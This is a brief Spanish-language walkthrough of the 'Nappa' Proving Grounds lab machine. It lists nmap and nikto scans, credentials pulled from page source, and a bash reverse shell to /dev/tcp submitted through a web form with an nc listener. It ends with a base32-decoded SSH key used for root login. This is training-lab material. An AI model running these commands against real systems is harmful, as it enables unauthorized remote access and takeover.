Nappa
ProvingGrounds Linux
nmap -A -p- -oA nappa 192.168.77.114 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA nappa 192.168.77.114
nmap -sU -O -p- -oA nappa-udp 192.168.77.114
nikto -h 192.168.77.114:80
Nos registramos y vamos al foro en Features Roadmap
Hacemos un Ctrl + U en http://192.168.77.114:8080/register
credenciales
admin.forum@easysetting.com:it0jNc6L/r090Q==
Modificamos el codigo de html y quitamos los comentarios. tambien borramos el atributo de readonly.
bash -c ‘bash -i >& /dev/tcp/192.168.49.77/3306 0>&1’
nc -lvnp 3306
Al introducir el siguiente comando en el formulario. Hacemos click en submit query.
cat ~/.bashrc
echo -n “FUWS2L…” | base32 -d
Conseguimos una llave y lo metemos en id_rsa
chmod 600 id_rsa
ssh -i id_rsa root@192.168.77.114 -p60022
